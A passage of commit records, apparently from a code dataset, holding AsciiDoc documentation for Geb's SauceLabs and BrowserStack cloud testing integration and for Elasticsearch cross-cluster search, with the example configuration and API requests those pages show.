named `nexus4Test`.\n<7> Configure all of the generated test tasks; for each of them the closure is run with delegate set to a test task being configured.\n<8> Pass credentials for BrowserStack.\n\nIt's also possible to specify location and credentials for the proxy to be used with the BrowserStack Tunnel:\n\n[source,groovy,subs=\"attributes,verbatim\"]\n----\nbrowserStack {\n account {\n proxyHost = '127.0.0.1'\n proxyPort = '8080'\n proxyUser = 'user'\n proxyPass = 'secret'\n }\n}\n----\n\n[TIP]\n====\nYou can use `allBrowserStackTests` task that will depend on all of the generated test tasks to run all of them during a build.\n====\n","old_contents":"= Cloud browser testing\n\nWhen you want to perform web testing on multiple browsers and operating systems, it can be quite complicated to maintain machines for each of the target environments.\nThere are a few companies that provide \"remote web browsers as a service\", making it easy to do this sort of matrix testing without having to maintain the multiple browser installations yourself.\nGeb provides easy integration with two such services, link:https:\/\/saucelabs.com\/[SauceLabs] and link:http:\/\/www.browserstack.com\/[BrowserStack].\nThis integration includes two parts: assistance with creating a driver in `GebConfig.groovy` and a Gradle plugin.\n\n== Creating a driver\n\nFor both SauceLabs and BrowserStack, a special driver factory is provided that, given a browser specification as well as an username and access key, creates an instance of `RemoteWebDriver` configured\nto use a browser in the cloud.\nExamples of typical usage in `GebConfig.groovy` are included below.\nThey will configure Geb to run in SauceLabs\/BrowserStack if the appropriate system property is set, and if not it will use whatever driver that is configured.\nThis is useful if you want to run the code in a local browser for development.\nIn theory you could use any system property to pass the browser specification but `geb.saucelabs.browser`\/`geb.browserstack.browser` are also used by the Geb Gradle plugins, so it's a good idea to\nstick with those property names.\n\nThe first parameter passed to the `create()` method is a \u201dbrowser specification\u201c and it should be a list of required browser capabilities in Java properties file format:\n\n----\nbrowserName=\u00abbrowser name as per values of fields in org.openqa.selenium.remote.BrowserType\u00bb\nplatform=\u00abplatform as per enum item names in org.openqa.selenium.Platform\u00bb\nversion=\u00abversion\u00bb\n----\n\nAssuming you're using the following snippet in your `GebConfig.groovy` to execute your code via SauceLabs with Firefox 19 on Linux, you would set the `geb.saucelabs.browser` system property to:\n\n----\nbrowserName=firefox\nplatform=LINUX\nversion=19\n----\n\nand to execute it with IE 9 on Vista to:\n\n----\nbrowserName=internet explorer\nplatform=VISTA\nversion=9\n----\n\nSome browsers like Chrome automatically update to the latest version; for these browsers you don't need to specify the version as there's only one, and you would use something like:\n\n----\nbrowserName=chrome\nplatform=MAC\n----\n\nas the \u201dbrowser specification\u201c. For a full list of available browsers, versions and operating systems refer to your cloud provider's documentation:\n\n* link:https:\/\/saucelabs.com\/docs\/platforms\/webdriver[SauceLabs platform list]\n* link:http:\/\/www.browserstack.com\/list-of-browsers-and-platforms?product=automate[BrowserStack Browsers and Platforms list]\n\nPlease note that Geb Gradle plugins can set the `geb.saucelabs.browser`\/`geb.browserstack.browser` system properties for you using the aforementioned format.\n\nFollowing the browser specification are the username and access key used to identify your account with the cloud provider.\nThe example uses two environment variables to access this information.\nThis is usually the easiest way of passing something secret to your build in open CI services like link:https:\/\/drone.io\/[drone.io] or link:https:\/\/travis-ci.org\/[Travis CI] if your code is public, but you can\nuse other mechanisms if desired.\n\nYou can optionally pass additional configuration settings by providing a Map to the `create()` method as the last parameter.\nThe configuration options available are described in your cloud provider's documentation:\n\n* link:https:\/\/saucelabs.com\/docs\/additional-config[SauceLabs additional config]\n* link:http:\/\/www.browserstack.com\/automate\/capabilities[BrowserStack Capabilities]\n\nFinally, there is also link:api\/geb\/driver\/CloudDriverFactory.html#create(java.lang.String,%20java.lang.String,%20Map%3CString,%20Object%3E)[an overloaded version of `create()` method] available that\ndoesn't take a string specification and allows you to simply specify all the required capabilities using a map.\nThis method might be useful if you just want to use the factory, but don't need the build level parametrization.\n\n[[sauce-labs-driver-factory]]\n=== `SauceLabsDriverFactory`\n\nThe following is an example of utilizing `SauceLabsDriverFactory` in `GebConfig.groovy` to configure a driver that will use a browser provided in the SauceLabs cloud.\n\n[source,groovy]\n----\ndef sauceLabsBrowser = System.getProperty(\"geb.saucelabs.browser\")\nif (sauceLabsBrowser) {\n driver = {\n def username = System.getenv(\"GEB_SAUCE_LABS_USER\")\n assert username\n def accessKey = System.getenv(\"GEB_SAUCE_LABS_ACCESS_PASSWORD\")\n assert accessKey\n new SauceLabsDriverFactory().create(sauceLabsBrowser, username, accessKey)\n }\n}\n----\n\n[[browser-stack-driver-factory]]\n=== `BrowserStackDriverFactory`\n\nThe following is an example of utilizing `BrowserStackDriverFactory` in `GebConfig.groovy` to configure a driver that will use a browser provided in the BrowserStack cloud.\n\n[source,groovy]\n----\ndef browserStackBrowser = System.getProperty(\"geb.browserstack.browser\")\nif (browserStackBrowser) {\n driver = {\n def username = System.getenv(\"GEB_BROWSERSTACK_USERNAME\")\n assert username\n def accessKey = System.getenv(\"GEB_BROWSERSTACK_AUTHKEY\")\n assert accessKey\n new BrowserStackDriverFactory().create(browserStackBrowser, username, accessKey)\n }\n}\n----\n\nIf using `localIdentifier` support:\n\n[source,groovy]\n----\ndef browserStackBrowser = System.getProperty(\"geb.browserstack.browser\")\nif (browserStackBrowser) {\n driver = {\n def username = System.getenv(\"GEB_BROWSERSTACK_USERNAME\")\n assert username\n def accessKey = System.getenv(\"GEB_BROWSERSTACK_AUTHKEY\")\n assert accessKey\n def localId = System.getenv(\"GEB_BROWSERSTACK_LOCALID\")\n assert localId\n new BrowserStackDriverFactory().create(browserStackBrowser, username, accessKey, localId)\n }\n}\n----\n\n== Gradle plugins\n\nFor both SauceLabs and BrowserStack, Geb provides a Gradle plugin which simplifies declaring the account and browsers that are desired, as well as configuring a tunnel to allow the cloud provider to\naccess local applications.\nThese plugins allow easily creating multiple `Test` tasks that will have the appropriate `geb.PROVIDER.browser` property set (where _PROVIDER_ is either `saucelabs` or `browserstack`).\nThe value of that property can be then passed in configuration file to <<sauce-labs-driver-factory>>\/<<browser-stack-driver-factory>> as the \u201dbrowser specification\u201c.\nExamples of typical usage are included below.\n\n=== geb-saucelabs plugin\n\nFollowing is an example of using the geb-saucelabs Gradle plugin.\n\n[source,groovy,subs=\"attributes,verbatim\"]\n----\nimport geb.gradle.saucelabs.SauceAccount\n\napply plugin: \"geb-saucelabs\" \/\/<1>\n\nbuildscript { \/\/<2>\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'org.gebish:geb-gradle:{geb-version}'\n }\n}\n\nrepositories { \/\/<3>\n maven { url \"http:\/\/repository-saucelabs.forge.cloudbees.com\/release\" }\n}\n\ndependencies { \/\/<4>\n sauceConnect \"com.saucelabs:ci-sauce:1.81\"\n}\n\nsauceLabs {\n browsers { \/\/<5>\n firefox_linux_19\n chrome_mac\n delegate.\"internet explorer_vista_9\"\n nexus4 { \/\/<6>\n capabilities(\n browserName: \"android\",\n platform: \"Linux\",\n version: \"4.4\",\n deviceName: \"LG Nexus 4\"\n )\n }\n }\n task { \/\/<7>\n testClassesDir = test.testClassesDir\n testSrcDirs = test.testSrcDirs\n classpath = test.classpath\n }\n account { \/\/<8>\n username = System.getenv(SauceAccount.USER_ENV_VAR)\n accessKey = System.getenv(SauceAccount.ACCESS_KEY_ENV_VAR)\n }\n connect { \/\/<9>\n port = 4444 \/\/<10>\n additionalOptions = ['--proxy', 'proxy.example.com:8080'] \/\/<11>\n }\n}\n----\n<1> Apply the plugin to the build.\n<2> Specify how to resolve the plugin.\n<3> Declare a repository for resolving SauceConnect.\n<4> Declare version of SauceConnect to be used as part of the `sauceConnect` configuration. This will be used by tasks that open a {sauce-connect} tunnel before\nrunning the generated test tasks which means that the browsers in the cloud will have localhost pointing at the machine running the build.\n<5> Declare that tests should run in 3 different browsers using the shorthand syntax; this will generate the following `Test` tasks: `firefoxLinux19Test`, `chromeMacTest` and\n`internet explorerVista9Test`.\n<6> Explicitly specify the required browser capabilities if the shorthand syntax doesn't allow you to express all needed capabilities; the example will generate a `Test` task named `nexus4Test`.\n<7> Configure all of the generated test tasks; for each of them the closure is run with delegate set to a test task being configured.\n<8> Pass credentials for {sauce-connect}.\n<9> Additionally configure {sauce-connect} if desired.\n<10> Override the port used by SauceConnect, defaults to 4445.\n<11> Pass additional link:https:\/\/docs.saucelabs.com\/reference\/sauce-connect\/#command-line-options[command line options] to SauceConnect.\n\n[TIP]\n====\nYou can use `allSauceLabsTests` task that will depend on all of the generated test tasks to run all of them during a build.\n====\n\n=== geb-browserstack\n\nFollowing is an example of using the geb-browserstack Gradle plugin.\n\n[source,groovy,subs=\"attributes,verbatim\"]\n----\nimport geb.gradle.browserstack.BrowserStackAccount\n\napply plugin: \"geb-browserstack\" \/\/<1>\n\nbuildscript { \/\/<2>\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'org.gebish:geb-gradle:{geb-version}'\n }\n}\n\nbrowserStack {\n application 'http:\/\/localhost:8080' \/\/<3>\n forceLocal = true \/\/<4>\n browsers { \/\/<5>\n firefox_mac_19\n chrome_mac\n delegate.\"internet explorer_windows_9\"\n nexus4 { \/\/<6>\n capabilities browserName: \"android\", platform: \"ANDROID\", device: \"Google Nexus 4\"\n }\n }\n task { \/\/<7>\n testClassesDir = test.testClassesDir\n testSrcDirs = test.testSrcDirs\n classpath = test.classpath\n }\n account { \/\/<8>\n username = System.getenv(BrowserStackAccount.USER_ENV_VAR)\n accessKey = System.getenv(BrowserStackAccount.ACCESS_KEY_ENV_VAR)\n }\n}\n----\n<1> Apply the plugin to the build.\n<2> Specify how to resolve the plugin.\n<3> Specify which urls the BrowserStack Tunnel should be able to access.\nMultiple applications can be specified.\nIf no applications are specified, the tunnel will not be restricted to particular URLs.\n<4> Configure BrowserStack tunnel to route all traffic via the local machine.\nThis configuration property controls the `-forcelocal` flag and the default value for it is `false`.\n<5> Declare that tests should run in 3 different browsers using the shorthand syntax; this will generate the following `Test` tasks: `firefoxLinux19Test`, `chromeMacTest` and\n`internet explorerVista9Test`.\n<6> Explicitly specify the required browser capabilities if the shorthand syntax doesn't allow you to express all needed capabilities; the example will generate a `Test` task named `nexus4Test`.\n<7> Configure all of the generated test tasks; for each of them the closure is run with delegate set to a test task being configured.\n<8> Pass credentials for BrowserStack.\n\n[TIP]\n====\nYou can use `allBrowserStackTests` task that will depend on all of the generated test tasks to run all of them during a build.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"841d961b584a7cab97c724aa669ba5261a2242c7","subject":"[DOCS] Document CCS-supported APIs (#52708)","message":"[DOCS] Document CCS-supported APIs (#52708)\n\nExplicitly notes the Elasticsearch API endpoints that support CCS.\r\n\r\nThis should deter users from attempting to use CCS with other API\r\nendpoints, such as `GET <index>\/_doc\/<_id>`.","repos":"gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/modules\/cross-cluster-search.asciidoc","new_file":"docs\/reference\/modules\/cross-cluster-search.asciidoc","new_contents":"[chapter]\n[[modules-cross-cluster-search]]\n= Search across clusters\n\n*{ccs-cap}* lets you run a single search request against one or more\n<<modules-remote-clusters,remote clusters>>. For example, you can use a {ccs} to\nfilter and analyze log data stored on clusters in different data centers.\n\nIMPORTANT: {ccs-cap} requires <<modules-remote-clusters, remote clusters>>.\n\n[float]\n[[ccs-supported-apis]]\n== Supported APIs\n\nThe following APIs support {ccs}:\n\n* <<search-search,Search>>\n* <<search-multi-search,Multi search>>\n* <<search-template,Search template>>\n* <<multi-search-template,Multi search template>>\n\n[float]\n[[ccs-example]]\n== {ccs-cap} examples\n\n[float]\n[[ccs-remote-cluster-setup]]\n=== Remote cluster setup\n\nTo perform a {ccs}, you must have at least one remote cluster configured.\n\nThe following <<cluster-update-settings,cluster update settings>> API request\nadds three remote clusters:`cluster_one`, `cluster_two`, and `cluster_three`.\n\n[source,console]\n--------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"cluster\": {\n \"remote\": {\n \"cluster_one\": {\n \"seeds\": [\n \"127.0.0.1:9300\"\n ]\n },\n \"cluster_two\": {\n \"seeds\": [\n \"127.0.0.1:9301\"\n ]\n },\n \"cluster_three\": {\n \"seeds\": [\n \"127.0.0.1:9302\"\n ]\n }\n }\n }\n }\n}\n--------------------------------\n\/\/ TEST[setup:host]\n\/\/ TEST[s\/127.0.0.1:930\\d+\/\\${transport_host}\/]\n\n[float]\n[[ccs-search-remote-cluster]]\n=== Search a single remote cluster\n\nThe following <<search-search,search>> API request searches the\n`twitter` index on a single remote cluster, `cluster_one`.\n\n[source,console]\n--------------------------------------------------\nGET \/cluster_one:twitter\/_search\n{\n \"query\": {\n \"match\": {\n \"user\": \"kimchy\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[continued]\n\/\/ TEST[setup:twitter]\n\nThe API returns the following response:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"took\": 150,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 1,\n \"successful\": 1,\n \"failed\": 0,\n \"skipped\": 0\n },\n \"_clusters\": {\n \"total\": 1,\n \"successful\": 1,\n \"skipped\": 0\n },\n \"hits\": {\n \"total\" : {\n \"value\": 1,\n \"relation\": \"eq\"\n },\n \"max_score\": 1,\n \"hits\": [\n {\n \"_index\": \"cluster_one:twitter\", <1>\n \"_id\": \"0\",\n \"_score\": 1,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 150\/\"took\": \"$body.took\"\/]\n\/\/ TESTRESPONSE[s\/\"max_score\": 1\/\"max_score\": \"$body.hits.max_score\"\/]\n\/\/ TESTRESPONSE[s\/\"_score\": 1\/\"_score\": \"$body.hits.hits.0._score\"\/]\n\n<1> The search response body includes the name of the remote cluster in the\n`_index` parameter.\n\n[float]\n[[ccs-search-multi-remote-cluster]]\n=== Search multiple remote clusters\n\nThe following <<search,search>> API request searches the `twitter` index on\nthree clusters:\n\n* Your local cluster\n* Two remote clusters, `cluster_one` and `cluster_two`\n\n[source,console]\n--------------------------------------------------\nGET \/twitter,cluster_one:twitter,cluster_two:twitter\/_search\n{\n \"query\": {\n \"match\": {\n \"user\": \"kimchy\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[continued]\n\nThe API returns the following response:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"took\": 150,\n \"timed_out\": false,\n \"num_reduce_phases\": 4,\n \"_shards\": {\n \"total\": 3,\n \"successful\": 3,\n \"failed\": 0,\n \"skipped\": 0\n },\n \"_clusters\": {\n \"total\": 3,\n \"successful\": 3,\n \"skipped\": 0\n },\n \"hits\": {\n \"total\" : {\n \"value\": 3,\n \"relation\": \"eq\"\n },\n \"max_score\": 1,\n \"hits\": [\n {\n \"_index\": \"twitter\", <1>\n \"_id\": \"0\",\n \"_score\": 2,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n },\n {\n \"_index\": \"cluster_one:twitter\", <2>\n \"_id\": \"0\",\n \"_score\": 1,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n },\n {\n \"_index\": \"cluster_two:twitter\", <3>\n \"_id\": \"0\",\n \"_score\": 1,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 150\/\"took\": \"$body.took\"\/]\n\/\/ TESTRESPONSE[s\/\"max_score\": 1\/\"max_score\": \"$body.hits.max_score\"\/]\n\/\/ TESTRESPONSE[s\/\"_score\": 1\/\"_score\": \"$body.hits.hits.0._score\"\/]\n\/\/ TESTRESPONSE[s\/\"_score\": 2\/\"_score\": \"$body.hits.hits.1._score\"\/]\n\n<1> This document's `_index` parameter doesn't include a cluster name. This\nmeans the document came from the local cluster.\n<2> This document came from `cluster_one`.\n<3> This document came from `cluster_two`.\n\n[float]\n[[skip-unavailable-clusters]]\n== Skip unavailable clusters\n\nBy default, a {ccs} returns an error if *any* cluster in the request is\nunavailable.\n\nTo skip an unavailable cluster during a {ccs}, set the\n<<skip-unavailable,`skip_unavailable`>> cluster setting to `true`.\n\nThe following <<cluster-update-settings,cluster update settings>> API request\nchanges `cluster_two`'s `skip_unavailable` setting to `true`.\n\n[source,console]\n--------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"cluster.remote.cluster_two.skip_unavailable\": true\n }\n}\n--------------------------------\n\/\/ TEST[continued]\n\nIf `cluster_two` is disconnected or unavailable during a {ccs}, {es} won't\ninclude matching documents from that cluster in the final results.\n\n[discrete]\n[[ccs-works]]\n== How {ccs} works\n\ninclude::.\/remote-clusters.asciidoc[tag=how-remote-clusters-work]\n\n[discrete]\n[[ccs-gateway-seed-nodes]]\n=== Selecting gateway and seed nodes\n\nGateway and seed nodes need to be accessible from the local cluster via your\nnetwork.\n\nBy default, any master-ineligible node can act as a gateway node. If wanted,\nyou can define the gateway nodes for a cluster by setting\n`cluster.remote.node.attr.gateway` to `true`.\n\nFor {ccs}, we recommend you use gateway nodes that are capable of serving as\n<<coordinating-node,coordinating nodes>> for search requests. If\nwanted, the seed nodes for a cluster can be a subset of these gateway nodes.\n\n[discrete]\n[[ccs-network-delays]]\n=== How {ccs} handles network delays\n\nBecause {ccs} involves sending requests to remote clusters, any network delays\ncan impact search speed. To avoid slow searches, {ccs} offers two options for\nhandling network delays:\n\n<<ccs-min-roundtrips,Minimize network roundtrips>>::\nBy default, {es} reduces the number of network roundtrips between remote\nclusters. This reduces the impact of network delays on search speed. However,\n{es} can't reduce network roundtrips for large search requests, such as those\nincluding a <<request-body-search-scroll, scroll>> or\n<<request-body-search-inner-hits,inner hits>>.\n+\nSee <<ccs-min-roundtrips>> to learn how this option works.\n\n<<ccs-unmin-roundtrips, Don't minimize network roundtrips>>:: For search\nrequests that include a scroll or inner hits, {es} sends multiple outgoing and\ningoing requests to each remote cluster. You can also choose this option by\nsetting the <<ccs-minimize-roundtrips,`ccs_minimize_roundtrips`>> parameter to\n`false`. While typically slower, this approach may work well for networks with\nlow latency.\n+\nSee <<ccs-unmin-roundtrips>> to learn how this option works.\n\n[float]\n[[ccs-min-roundtrips]]\n==== Minimize network roundtrips\n\nHere's how {ccs} works when you minimize network roundtrips.\n\n. You send a {ccs} request to your local cluster. A coordinating node in that\ncluster receives and parses the request.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-request.svg[]\n\n. The coordinating node sends a single search request to each cluster, including\nthe local cluster. Each cluster performs the search request independently,\napplying its own cluster-level settings to the request.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-search.svg[]\n\n. Each remote cluster sends its search results back to the coordinating node.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-results.svg[]\n\n. After collecting results from each cluster, the coordinating node returns the\nfinal results in the {ccs} response.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-response.svg[]\n\n[float]\n[[ccs-unmin-roundtrips]]\n==== Don't minimize network roundtrips\n\nHere's how {ccs} works when you don't minimize network roundtrips.\n\n. You send a {ccs} request to your local cluster. A coordinating node in that\ncluster receives and parses the request.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-request.svg[]\n\n. The coordinating node sends a <<search-shards,search shards>> API request to\neach remote cluster.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-search.svg[]\n\n. Each remote cluster sends its response back to the coordinating node.\nThis response contains information about the indices and shards the {ccs}\nrequest will be executed on.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-results.svg[]\n\n. The coordinating node sends a search request to each shard, including those in\nits own cluster. Each shard performs the search request independently.\n+\n[WARNING]\n====\nWhen network roundtrips aren't minimized, the search is executed as if all data\nwere in the coordinating node's cluster. We recommend updating cluster-level\nsettings that limit searches, such as `action.search.shard_count.limit`,\n`pre_filter_shard_size`, and `max_concurrent_shard_requests`, to account for\nthis. If these limits are too low, the search may be rejected.\n====\n+\nimage:images\/ccs\/ccs-dont-min-roundtrip-shard-search.svg[]\n\n. Each shard sends its search results back to the coordinating node.\n+\nimage:images\/ccs\/ccs-dont-min-roundtrip-shard-results.svg[]\n\n. After collecting results from each cluster, the coordinating node returns the\nfinal results in the {ccs} response.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-response.svg[]\n","old_contents":"[chapter]\n[[modules-cross-cluster-search]]\n= Search across clusters\n\n*{ccs-cap}* lets you run a single search request against one or more\n<<modules-remote-clusters,remote clusters>>. For example, you can use a {ccs} to\nfilter and analyze log data stored on clusters in different data centers.\n\nIMPORTANT: {ccs-cap} requires <<modules-remote-clusters, remote clusters>>.\n\n[float]\n[[ccs-example]]\n== {ccs-cap} examples\n\n[float]\n[[ccs-remote-cluster-setup]]\n=== Remote cluster setup\n\nTo perform a {ccs}, you must have at least one remote cluster configured.\n\nThe following <<cluster-update-settings,cluster update settings>> API request\nadds three remote clusters:`cluster_one`, `cluster_two`, and `cluster_three`.\n\n[source,console]\n--------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"cluster\": {\n \"remote\": {\n \"cluster_one\": {\n \"seeds\": [\n \"127.0.0.1:9300\"\n ]\n },\n \"cluster_two\": {\n \"seeds\": [\n \"127.0.0.1:9301\"\n ]\n },\n \"cluster_three\": {\n \"seeds\": [\n \"127.0.0.1:9302\"\n ]\n }\n }\n }\n }\n}\n--------------------------------\n\/\/ TEST[setup:host]\n\/\/ TEST[s\/127.0.0.1:930\\d+\/\\${transport_host}\/]\n\n[float]\n[[ccs-search-remote-cluster]]\n=== Search a single remote cluster\n\nThe following <<search,search>> API request searches the\n`twitter` index on a single remote cluster, `cluster_one`.\n\n[source,console]\n--------------------------------------------------\nGET \/cluster_one:twitter\/_search\n{\n \"query\": {\n \"match\": {\n \"user\": \"kimchy\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[continued]\n\/\/ TEST[setup:twitter]\n\nThe API returns the following response:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"took\": 150,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 1,\n \"successful\": 1,\n \"failed\": 0,\n \"skipped\": 0\n },\n \"_clusters\": {\n \"total\": 1,\n \"successful\": 1,\n \"skipped\": 0\n },\n \"hits\": {\n \"total\" : {\n \"value\": 1,\n \"relation\": \"eq\"\n },\n \"max_score\": 1,\n \"hits\": [\n {\n \"_index\": \"cluster_one:twitter\", <1>\n \"_id\": \"0\",\n \"_score\": 1,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 150\/\"took\": \"$body.took\"\/]\n\/\/ TESTRESPONSE[s\/\"max_score\": 1\/\"max_score\": \"$body.hits.max_score\"\/]\n\/\/ TESTRESPONSE[s\/\"_score\": 1\/\"_score\": \"$body.hits.hits.0._score\"\/]\n\n<1> The search response body includes the name of the remote cluster in the\n`_index` parameter.\n\n[float]\n[[ccs-search-multi-remote-cluster]]\n=== Search multiple remote clusters\n\nThe following <<search,search>> API request searches the `twitter` index on\nthree clusters:\n\n* Your local cluster\n* Two remote clusters, `cluster_one` and `cluster_two`\n\n[source,console]\n--------------------------------------------------\nGET \/twitter,cluster_one:twitter,cluster_two:twitter\/_search\n{\n \"query\": {\n \"match\": {\n \"user\": \"kimchy\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[continued]\n\nThe API returns the following response:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"took\": 150,\n \"timed_out\": false,\n \"num_reduce_phases\": 4,\n \"_shards\": {\n \"total\": 3,\n \"successful\": 3,\n \"failed\": 0,\n \"skipped\": 0\n },\n \"_clusters\": {\n \"total\": 3,\n \"successful\": 3,\n \"skipped\": 0\n },\n \"hits\": {\n \"total\" : {\n \"value\": 3,\n \"relation\": \"eq\"\n },\n \"max_score\": 1,\n \"hits\": [\n {\n \"_index\": \"twitter\", <1>\n \"_id\": \"0\",\n \"_score\": 2,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n },\n {\n \"_index\": \"cluster_one:twitter\", <2>\n \"_id\": \"0\",\n \"_score\": 1,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n },\n {\n \"_index\": \"cluster_two:twitter\", <3>\n \"_id\": \"0\",\n \"_score\": 1,\n \"_source\": {\n \"user\": \"kimchy\",\n \"date\": \"2009-11-15T14:12:12\",\n \"message\": \"trying out Elasticsearch\",\n \"likes\": 0\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 150\/\"took\": \"$body.took\"\/]\n\/\/ TESTRESPONSE[s\/\"max_score\": 1\/\"max_score\": \"$body.hits.max_score\"\/]\n\/\/ TESTRESPONSE[s\/\"_score\": 1\/\"_score\": \"$body.hits.hits.0._score\"\/]\n\/\/ TESTRESPONSE[s\/\"_score\": 2\/\"_score\": \"$body.hits.hits.1._score\"\/]\n\n<1> This document's `_index` parameter doesn't include a cluster name. This\nmeans the document came from the local cluster.\n<2> This document came from `cluster_one`.\n<3> This document came from `cluster_two`.\n\n[float]\n[[skip-unavailable-clusters]]\n== Skip unavailable clusters\n\nBy default, a {ccs} returns an error if *any* cluster in the request is\nunavailable.\n\nTo skip an unavailable cluster during a {ccs}, set the\n<<skip-unavailable,`skip_unavailable`>> cluster setting to `true`.\n\nThe following <<cluster-update-settings,cluster update settings>> API request\nchanges `cluster_two`'s `skip_unavailable` setting to `true`.\n\n[source,console]\n--------------------------------\nPUT _cluster\/settings\n{\n \"persistent\": {\n \"cluster.remote.cluster_two.skip_unavailable\": true\n }\n}\n--------------------------------\n\/\/ TEST[continued]\n\nIf `cluster_two` is disconnected or unavailable during a {ccs}, {es} won't\ninclude matching documents from that cluster in the final results.\n\n[discrete]\n[[ccs-works]]\n== How {ccs} works\n\ninclude::.\/remote-clusters.asciidoc[tag=how-remote-clusters-work]\n\n[discrete]\n[[ccs-gateway-seed-nodes]]\n=== Selecting gateway and seed nodes\n\nGateway and seed nodes need to be accessible from the local cluster via your\nnetwork.\n\nBy default, any master-ineligible node can act as a gateway node. If wanted,\nyou can define the gateway nodes for a cluster by setting\n`cluster.remote.node.attr.gateway` to `true`.\n\nFor {ccs}, we recommend you use gateway nodes that are capable of serving as\n<<coordinating-node,coordinating nodes>> for search requests. If\nwanted, the seed nodes for a cluster can be a subset of these gateway nodes.\n\n[discrete]\n[[ccs-network-delays]]\n=== How {ccs} handles network delays\n\nBecause {ccs} involves sending requests to remote clusters, any network delays\ncan impact search speed. To avoid slow searches, {ccs} offers two options for\nhandling network delays:\n\n<<ccs-min-roundtrips,Minimize network roundtrips>>::\nBy default, {es} reduces the number of network roundtrips between remote\nclusters. This reduces the impact of network delays on search speed. However,\n{es} can't reduce network roundtrips for large search requests, such as those\nincluding a <<request-body-search-scroll, scroll>> or\n<<request-body-search-inner-hits,inner hits>>.\n+\nSee <<ccs-min-roundtrips>> to learn how this option works.\n\n<<ccs-unmin-roundtrips, Don't minimize network roundtrips>>::\nFor search requests that include a scroll or inner hits, {es} sends multiple\noutgoing and ingoing requests to each remote cluster. You can also choose this\noption by setting the <<search,search>> API's\n<<ccs-minimize-roundtrips,`ccs_minimize_roundtrips`>> parameter to `false`.\nWhile typically slower, this approach may work well for networks with low\nlatency.\n+\nSee <<ccs-unmin-roundtrips>> to learn how this option works.\n\n[float]\n[[ccs-min-roundtrips]]\n==== Minimize network roundtrips\n\nHere's how {ccs} works when you minimize network roundtrips.\n\n. You send a {ccs} request to your local cluster. A coordinating node in that\ncluster receives and parses the request.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-request.svg[]\n\n. The coordinating node sends a single search request to each cluster, including\nthe local cluster. Each cluster performs the search request independently,\napplying its own cluster-level settings to the request.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-search.svg[]\n\n. Each remote cluster sends its search results back to the coordinating node.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-results.svg[]\n\n. After collecting results from each cluster, the coordinating node returns the\nfinal results in the {ccs} response.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-response.svg[]\n\n[float]\n[[ccs-unmin-roundtrips]]\n==== Don't minimize network roundtrips\n\nHere's how {ccs} works when you don't minimize network roundtrips.\n\n. You send a {ccs} request to your local cluster. A coordinating node 